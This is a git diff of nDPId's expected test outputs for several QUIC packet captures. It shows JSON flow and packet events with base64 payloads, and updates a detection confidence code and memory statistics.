02338{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1561708873447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1440,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1440,"pkt_l4_len":1358,"thread_ts_msec":1561708873447,"pkt":"AAAAAAAAAAIAGNwmCABFAAViAABAADgRVo1u54YjrBtF2AG7sdoFTr6M01EwNDYF0aOrrPYcbNEAAAAC\/8YjGS48qVhChWSun\/F\/0tw83QKJDLWjBYJA09IzRzwLQnCpg9NyEHpzaflUNehkOBavOBhu3YQm9xnHynBS8TFlxf6b7SbJ212GvxrQorob1FGVAX8oQ4qlKdNcH9KmGH8FQqiWXAUdP4wIv8bxJlPu0eWjvrQVEV4+WIaZItIH+aOUaSN9\/ilrA9RvBf\/Eg0uWYctKOmpFEGA9LEKr3HlpKp21MHHYkSpIqfP4A7ajmPfUk0qEmleXgrgJc3ZuVwkOUh+lp\/0eDnUOVGnw0Bef\/nRJzAy9BZYUOHKfKJigrc1SrncXcXGesF5G8MJfo5lQQeKDSwoFevbeXZPRaK1FV8AI13mn1U7+k+RqYwMfqTzjcryU\/s5BA04mts+Ch050+b0vPi6EOfeOA1CLxv\/tk6KsNDiigEk01rPLNm\/hEnaVJMANIzUHvUP4jg3PU04wvG3u8GEaxXwy79Kn6368OsQ8hdAqoLyQpQyhi1ABBqvxZWZGsUTcum\/BfVuIRpmo5YvcWIiYFY\/Q6OXLR9R2vVMjhnQvgbZY+rzI0fcZRdscepkhRGzz77vGIKYhgUxMxPqTprvkoXFsDJnTqnp4n2GwWBLIb0OyfRf\/7VRBKuLzhYfdO+kGKah6INzDv1vEkf39Q6kBHznQt9lH735l+OscDivp0nZu4MdQyN7vfOJNp9+jgtg8n2ANvCzvvW+7oAPTELH+3+cxxBeh66ejadW2+\/yfNqGNsYWunD\/XCKd4D2V+lhoYnV56+qwSLgUXXWB2mY\/jm0ycFhQ\/Q6nqSn\/I2aBJISRolyEFPYh65rNrttlVuSy4cI8laG8Su6VBG5Uuo4K9zFSe74fhMvn\/3xxSa9X04Mry4juPeEmANXZBAppqqM0xlJabIn2HLD847OZiYuNRgulowJTRYa0BeXeFFYwg5asYjFOcmIPelC6rywwM4C200+37pJCuqY
hl7VRwKcsiCZz5pFD6vxpCnxBkjn70ZSRCzczW97N+mAXR4TjhOAdfEQuhrY7Y+WOOlG0I5lw5fpu2\/+2zMe3NZEICyLuE+yMXBwxKksv83s\/2DTmSfmADa1Lt+OXCdJZp8e\/fI5MOWyzXREHAWA0p1Xxf0JQBAFaDVmD71NXRa\/e3YP6nmQf+KzlbGl8euL1ZMv9cv4hs6puTZquoiq4UkwuYeq+A+wUrbkmifgCFGTsiIuVdxZoBfG7mmTcuzlAoj7eSy93FWGxAPnzH+xvdqwSDn+7M9vnHHpWIC+VzveE\/CCes4f3ceohr7y5Dn4lOtoe0vJsPwQpFPf9WtVwM8s2MSRZtgUxdYy5XHczX5uN1c9SlpRqooXhpp0yi4N2DxMNkDHytOhz\/qgou3wcDLhbNb1ToJSHgg+yYI1HFM5GCUBgIcEFdWUnHIoDy\/X\/\/efj02fBjznW3x\/I9rMer6Tvkfo0yrJwxvKS3Vqlk4oY2riLgvgmR0l5D63Voz6cwqCDFk4DSzDUTn584mcKd5zBHU9ozz0R3Cik1cL2iA9pnd7oEAwphcmb3YbMTagxytlPSkDBIcz0Kd4BlZBLPTo1k6ef5SlDhP6oHZInjU+ubb+1fUF0evxg8wgtXW0cZjOTqIqNyOZPsUhY\/78wYZIpgpZZEa60kxvwRBUQ6WZuEEAWO4u8bU4NqJQII0XYAAfp5H0\/BDB\/p+vVgnc1k2DvUWm66+G5dwcauNbi4ru1irvoLehKJx5aMF+fJOZNqPIwy+\/4iFLOkcGGA36sQMRqTOLRYNzYbHYC8YZ\/SOqMCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1561708873328,"flow_last_seen":1561708876422,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5220,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1561708876422,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1561708873328,"flow_last_seen":1561708876422,"flow_idle_time":200000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5220,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1561708876422,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":5220,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1561708876422} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870069 bytes -~~ total memory freed........: 5870069 bytes -~~ total allocations/frees...: 118135/118135 +~~ total memory allocated....: 6003703 bytes +~~ total memory freed........: 6003703 bytes +~~ total allocations/frees...: 120897/120897 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 466 chars ~~ json string max len.......: 2343 chars 
diff --git a/test/results/quic_q50.pcap.out b/test/results/quic_q50.pcap.out index 6ee1da808..2bc15b6de 100644 --- a/test/results/quic_q50.pcap.out +++ b/test/results/quic_q50.pcap.out 
@@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1592388088469} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02261{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388088469,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1592388088469,"pkt":"AAAAAAAAAAUAeJuECABFAAVi6fZAAD8RV+v4kIGTuJfB7ZkjAbsFTkJ3y1EwNTAI30oInk7\/XnoAAEU0Sh+G6jJaQ+WVeKqfVhwekyVcdAg3VVt4yXAoIvukSElad3ZdF7cP3aK8QwnOEdppZZL4NlS1J14QMkJkSKLH7KTs\/J1g5Qy7Td2oJivMgU4heBjsrEKX+Kl+zumCGj7r3rx\/PiGGoerDCuUYVs8\/3DPxrp05vPpL4oM6Ym20RL14LkdkclpZEotPzAVfKrp+bORIrEsOakCOFcnmRLxpaPe+skuFxQ7e+No86i++ZXUpHINRIOrrAKO6MnqhHg136TH30JRy5V1vvrx9mRvozkvzR4RrmmOWFYy9MHcYvR9ozsenVMRZ7mYRkPWmCIPXpnhEE4otBm+PYFJSnVZnoQYn2HvDgKZX+IG0tDtVasnvuIWtUyehZMOA3Auz2JN+nSjxfDEV9Q5eGeh8ZL7tXInICXQpmTBohUGs0nyUi\/EfxDhlCRPETyBYxPytgznwCOTRnGV6yUDNYNW6V2twpvbbFw15F57Y24i98N43glYYJUVqHmVwrosseQvdWLtOLEXpAKvwYCJ3nJpSVOyBYXd8okAO08VeVbydpen0iUOESN83ACwm402annjMIqbJEkKbZr1E\/bWLUE9ayryc3t4SI0rfAV3P7Bzoh+ePS0lFG2mEbR3Stl4jejVA5bbBNdQAl2XVCvlfkMcgN6wNzkaUtoY\/V5wJqcqWfzxU\/7CxIyuqjs2t5GkAirbR6GD1vSMG8A49cBdJIe0YUwOEL94vJZZ6kgFxLSzbkqIb\/JGeunCp3ImPtw51lpSKmOzgu+aiRAw0072bcZedmowvyNmMZ6ZwF9G2\/T1BzTiaxUQiuwph0MpDNq0KE8ZLx7252+rHJYkpatjHePpFvOb3XaUfP7KqMGQXysXzDurgMN+iUJmRB27gfV7BceLcaKv4JsOEla7D\/ujhuQ0U6YFyo2O4mZUs06yMlW36Jh9WkejggHA6SE58C6aM0tZVAq4PzUVmlUFs52p22qgRq5vex74TEu58hdkCQjr1pQ94XFmXqgk+AVK0nXtqdM4JYhPeaV0edHucrnphtrDalQIUwHX7zoFqP\/AzYEoeCztqDi\/kawodxc4PmEb6NM25k\/CXUeCX4uUwv5+p46bN3O1M+xvlb2rRRFG9UZ157Oh+jebOu+0rTdiK67yyDJDMe2VTvGsXi+\/G2gN2zIWwGydc\/InHPRNNQKfHhC2jggd6wv4d71pPOaI+XNe1l7JNMzHwfbkZBDlCbcSj+rryXRGPQIhCscDZiFFGrGBnyyH57ea6sGM\/d37gVVa+ukJTnovNq\/9LafSrWBaF2RrNYGE+TcplNYI0Sq5eb9DrfHpoz4HPjO4w6uwZIeHQjlw00+daMYbUpNYvzBru4JYoG4+FnfLnaJ2RX6rVgfBQIqnPe+8ho+oVfDUJnsA6e5JTlC5uDUaaRcrC0+Ji\/wYvhpr9KixWcINr\/Q6IJf8RuaNMWGUoYQRmSfJSGr9d2O1TlO6mLpi0PyY9rao+oramJEZVMS9CvaFzYMM4ekODEtI9lvm8
GVMwUuwhbqucZBCNIlAueuvDA9mFax9H3Da0FnXF80HbkF0G0pCqtWSLbDFAFtV9SICp3zwHTJ2IckUyzfK6paD68rLKFhUUBI7WeX4+s0d4Jr10hLHheThooXnr5xOHtBeSEaQFC9zlGwwIuoXzDqApq3BbVKodu6HoOITstmadm3\/MIc7\/KuaqI9NjMgaFSVmEVWOH4WbQci9HsoHbnpJWe8KeP3p1LSqGOSM6yXozbpkk0hMRvAJ\/Gnzq8KxN6H6U"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googletagmanager.com","user_agent":"Chrome\/83.0.4103.101 Android 8.0.0; LDN-L21"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.googletagmanager.com","user_agent":"Chrome\/83.0.4103.101 Android 8.0.0; LDN-L21"}} 
00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1592388088511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1592388088511,"pkt":"AAAAAAAAABAAH2tiCABFAABGAABAADgRTf64l8Ht+JCBkwG7mSMAMgZJwVEwNTAACN9KCJ5O\/156AEAYUqG2lTe2LeIe+Cm8S2sDMjR\/1C7uy5\/p"} 02265{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1592388088591,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1592388088591,"pkt":"AAAAAAAAABAAH2tiCABFAAViAABAADgRSOK4l8Ht+JCBkwG7mSMFTuaIwlEwNTAACN9KCJ5O\/156AEU0EsFIWbfyiDTriLZoVpXe8mBihbaaK+GuQgLUM2k18a9drw\/KbHYn2D+KnhueaQuI4b5RnobWiDslIfKd8Mirh6o2aIs9a9qw7cUa8PBv7bzqEIAEQzk13O3\/Bmcqazsp\/+kXQrRut7wvxnShl1xW4sNpOBXqxvlB\/nqN8wg\/PWpL9O\/FPVIgCehFv30qEPc3PeeKKCKLfVTqnxPixlqgAYeET9TKamxZDJ72\/UQ6NmlBJ28\/YXsjTDsXud+7gYqA\/RkmlBMjxYZbTaJJhQMqHb0o8hdYWan65TAd6PfEjGBDGWn2GDNSSzDYoVEizxOqWERff9oCjTo1xFO9yhHRjaWZgSFmltr5w5\/Hr6eKjmrddpc4Z+wxKpPufinLcs1Intywm6Clf6ukiL4ZIaBU1Zh4teRYOLqycNHKR892rQ3DuuxVXnpFwyl0zeIkME4yZSYiRCwgQLAMZ5FSfPbweT6hIb84RvwHrX1jO2SDi8RMi1Aevd6oV+JrNOluFTTAKRyLOen4BBBYTSn14h5EAGO0Yjv6iLbKRjvUAlFcrcWVM6\/JgP5X8XCg0n0XzSdc4uh5LhvkR\/h7IvFVZq89RpXeIhO2gstbOOib2aW\/JqKDzWo1j1Ph5gagHkB6L9a5Hjd8OSrqenRM\/Y9mJweUVKkHNmEigtNsMArIaCyxyspF5no9KUYo2Kbty26OhRt50wzulToOyP4NcHmZfEkQflkdukX3pqNAt7MXd3wyob825\/JiVxf+3hjyosU4MNO3H0eUpL9ozj7HdUKWylpVr+NEYpL6oqxrmoewXJqd9\/7HqfpRoNonB9ea0mdvP5YegQRlI+fyAKUMnIwTWXpzfIN2RNvsJqvBECokakuvOOGofWVmnplR5MVVywVaMLE82YUsCGwIntd0a+EJxQgL7mKQ6dtgeQsn1wbHWS02ZvPuWP8OYrCE67jL2v1bL6\/2h+1XCxsQAztrS+QayoAW0KvlpCNW9ac0DTJNHWRO2pghx+tJZNveH28v6DEDiB
rmIsxaWJtQIYwcHaS\/T1k9TL2LCukku0Taxl6+Feh7bikCsuVDfdGwZ2pRT01H4nEVENqSGeosdtxGfJ5JRhSV8U5ag1spdFlq0h3UcT8UYP6G3yr+GnTpv73QkQAN+x4OlLFujbI1BhryJRxg9c7xx4qXcEgWlOzLD1VUeIdTUw\/9wkqyS1DOLPWvJnyAWGAWLaLCSlJLekJUN7pBX8rjCfjU7xo6oWXvXMJVSzQZFernDGNc1++8ggV6oievhZKX7xQRNWnCNZClyhkVOAkRHz4B3Pu3La7QFMMFFm3BSS2brzbRyt2jJlkAxNS9aG4l00\/e6zrsSU1aVXhBuBimpONptOjBqK0HbHQLakoucHQiK+bYxbUBefBnGFTfqhmwHZxdyKtPzhH3xEm3CA5vgkPLpEOwlHEjoUbCvszlSBn0Wji8fHC4RVgQwIFqC5GXdKL2QfiRV\/OvVRBkGEKL67PAQH2qyWcGdC4moBOq1ncmuB4DIPvYwpdxlKDGChU2pNuD6lgg74F4ueOWbMcxGtj9TFP7rZPwDq2LKcVUPI30oOBmdOZPG\/tCzNe3afxNrp9eBk\/djyjs8g0B3CLoc0Rdn7ZnCf84F4GyVSI33v4zkOEKnbfwYmbCwm+M0HtlcdG9KI8P8CfdRpGL7i2rguXb1EIkg\/EYpYXxNoWqt46R76SStqYAB32M+Hm2ZBhlK23TOEoqV6bZc6sFLkDbytR7T7rgeeKXoBeF+Tvf8o\/ifp\/T"} -00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388088469,"flow_last_seen":1592388088935,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":19594,"flow_avg_l4_payload_len":979,"midstream":0,"thread_ts_msec":1592388088935,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1592388088469,"flow_last_seen":1592388088935,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":19594,"flow_avg_l4_payload_len":979,"midstream":0,"thread_ts_msec":1592388088935,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q50.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":19594,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1592388088935} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880384 bytes -~~ total memory freed........: 5880384 bytes -~~ total allocations/frees...: 118154/118154 +~~ total memory allocated....: 6014018 bytes +~~ total memory freed........: 6014018 bytes +~~ total allocations/frees...: 120916/120916 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2270 chars 
diff --git a/test/results/quic_t50.pcap.out b/test/results/quic_t50.pcap.out index 0ee38e0d1..ed4c302d8 100644 --- a/test/results/quic_t50.pcap.out +++ b/test/results/quic_t50.pcap.out 
@@ -2,10 +2,10 @@ 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1598618820564} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02266{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1598618820564,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598618820564,"pkt":"AAAAAAAAAAQAMt+PCABFAAViUWNAAH8RmQMomn\/IpvC80cKsAbsFTtXAxVQwNTAIVV8y018p2GMAAEU0sFS4EDNRQxtqte6TPI+YvWd+9vuUhbcTQ2HBn9gQQ44SheCG4iJpKGLD8uMQU9W2hflEcgLE5fOUXsKA3b4MY34rhhWyrjNYzozZ6RzNmC3+PSlNh1B9BkCmgwrPckh0gBVa\/FiA4QpDKG9FfMxAAMJa6frV7fG1bb\/7HJhI3yISKMBJBm82DF0OyCTOye8nQRPUiVu4WsjVf6TJP0\/YCQn\/ynhi7Ht\/RBa3IPlCUHvLu303v9QUCibeTQUAguISRnIMNJe1C11ibh+BPlrVWXB5I4w7PGgaDw6mvx7JTybAMrs\/zdPmdFbLzWLaLw6FF+1T6Nf5pXJ9+kE9uEXZ6FzdZDD3MbdQ7S7fF3Xsf3z9uQukVNaW\/VEZbNqdIcOzSZA1HMEos1dDC\/4ViVIfMlO84vWzhZLxq5UvTT6qapu5oFarxgYku3nnVTzVM6SRRUR15vAoGmL3hQ542vEoyxzgRnslUtNtYNF9zlTPnOomXF1\/xSoJJI3VGlXy1gOwEOp28n6wdjsWOzKyE8z1XmBGehbXOUESC8A5oRtpkqOzQJ3g5+dnZdSYCvXi2BLHGA+OVhHokC0D92CqxGKl340PEFDaTPqzeKg+DdhCKEuu94iUqJwa\/EQr0++J\/bZoJuya3A6PiiCAsAWEfWiGB4RZfM+JuqUNIdd0StL9dWeEo7kVq9MAq9yKOBhBD0Nw0u3O6ttMqxfEm25kPEexKv+eLXlFhK9pi814az\/wL0\/CoLWlaMBTnRRk8oxhNZZKjX5cREBszdn5VN++4tz2T7E2jOZOFaOODo\/Wvb7BjuenE7CpgjdjsnLE4Tn\/b4Q53nG\/TvK7\/82EKBXRq\/c5PKnM+b1ENV06F0Dt6cGZ80l0g1EXbz82dUS02CP8vLgamNhFvRmwk0Fytrw6YCdOz2pD+8LecT3ig9EfNeixeZRd4tX0VxcyI5WVzzONGrmWIw1RUeauVQKVXpwzPZA8CukmFuSLsJh+\/5N5AhFjT6YZ08Cfg8mb95WTaUR4Gcz21+e\/jxcv3N2Ucmp36VwT1\/tIEgMyHmC7IWqDmGHm0zoua0BH1NJEIxpCFxOkgrdVfA\/bFJKqQIiWn39D6QQCV9IfFHR0w3Ji8IRmUv2cmzofCCCDXIb7a1RfNYDUaRs4NsKQeKcoYbyoDk1GAb6it6FoAhucYrDmI18nx\/aim5gBIWa2dZw8lcSNFxgWB30MqUt4DZOv8SxNPiLUt+4S7VsKdmL3e9VzPcuMiIPdcykCdDjJcCNMkqrWApVw+k3MVLOUeIU51nBJ5vetMjeccL3kies1jAjqR3odF77JuN1k7xA13AyJHglJBfA9SrQAab1XP78SnPFaTVPIBb4lI+7BBbWiXiUIWbr7QDQ2M+jaZ9aeFPMMv4QQg7YuadL5n0vNmHJxgYLgQVYZUg3g+jMQJiu4KLUJuhihq+lqjYmXeKGtNpGoS9t+klWnsjGnRn75HVlDegNERH7rMuzV5M2eSrUWRcByRHbj5kRk
oY6s9x4THwi9YKFtPRSzpfXx6U8\/obpT4A56m9Dtlf0uhD38f9WkHLmiBpPtKg3V58sjjLsP3l91gyKwHDq9OPXkHBllrkj\/HjirESjdb1Tretiw6j18gO7a6gj9juTcUBG0eptAXXuJv2ZyrvtGzBo7DRc8B9KbYOIeUQf7UeOsamqbXhc1aNUt5qklsGe6OvEqu\/YEHpLYtQZ9LUddfbvcwZ\/RUIOT2ImtvT6yXQ32en9NmMy+OFHh52IUE4c2meqx38en"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.googleapis.com","user_agent":"Chrome\/85.0.4183.83 Windows NT 6.1; Win64; x64","version":"TLSv1.3","alpn":"h3-T050","ja3":"a2fc589336b7c13b674c1bab24655ce7","tls_supported_versions":"TLSv1.3"}} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1598618820564,"flow_last_seen":1598618820564,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1598618820564,"l3_proto":"ip4","src_ip":"40.154.127.200","dst_ip":"166.240.188.209","src_port":49836,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fonts.googleapis.com","user_agent":"Chrome\/85.0.4183.83 Windows NT 6.1; Win64; 
x64","version":"TLSv1.3","alpn":"h3-T050","ja3":"a2fc589336b7c13b674c1bab24655ce7","tls_supported_versions":"TLSv1.3"}} 02274{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_t50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1598618820569,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1598618820569,"pkt":"AAAAAAAAAAEA4e3RCABFAAViAABAADURNGem8LzRKJp\/yAG7wqwFTn46zVQwNTAACFVfMtNfKdhjAEU02pBfi6Ak9u575XrmlbdyG1ag5OIwl7285v3Nxnsw8Lwoy4F9DNlx3pltRvpYv7yRLUAj2EQdI1b8uEmcdP9Lk6QJsvFQO42M\/PbvgSv5aSBR7ADIvkagSIwjp53htGhz\/zYlUUs1e4BKFzWrzHxpBrn3tRk9tC4MHf9tUO5P3B2MeVI3O66nSXCHk1RyPj9cinn3ZjxKtRBXyqmW3s3M2KBsk8zV1XjY13hb0PYC7j36RkDDGj0hoPOlaMR3xRkchF5ijLsbftoS8ZgSl8iT+6IMAemfyOo2vM1AInYx5h0uJCKtYT1HD9yjV1obFkm9JNNq\/Q3d32M9ltbArc4UQulBjQL30PaOFeS6\/NH6OpYAFWIaQylZhMpolrLLQtDKkYaJQK7fW\/ad